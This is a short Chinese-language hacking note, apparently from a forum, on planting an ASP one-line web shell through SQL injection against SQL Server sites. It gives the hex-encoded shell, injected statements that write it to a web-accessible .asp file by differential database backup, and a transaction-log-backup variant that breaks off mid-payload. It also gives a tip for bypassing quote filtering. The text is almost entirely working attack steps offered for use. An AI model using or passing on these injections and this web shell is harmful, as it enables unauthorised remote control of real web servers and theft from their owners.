0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:webwokao.asp
声明:方法不是我想的,我只是写工具,默认得到shell是
<%execute(request("a"))%>
===============================================================
我发现上面代码,有时会无效,而直接用
backupdatabase库名todisk='c:ddd.bak'
createtable[dbo].[dtest]([cmd][image]);
insertintodtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E)
backupdatabase库名todisk='目标位置d.asp'WITHDIFFERENTIAL,FORMAT;--
却可以成功,所以把最原始的方法写出来!思路是前人所创,这不说大家也知道的!
库名必须要有效的库名,一般注入工具都可以得到!如果某站过滤"‘",就要把字符内容转为数值了!
网上还有log增量备份的,我也把他记录一下
=====================================================
另一种log增量备份技术:
';alterdatabasenullsetRECOVERYFULL--
';createtablecmd(aimage)--
';backuplognulltodisk='f:cmd'withinit--
';insertintocmd(a)values(0x3C2565786563757465287265717565737428226122292
更多相关内容:
-
无相关信息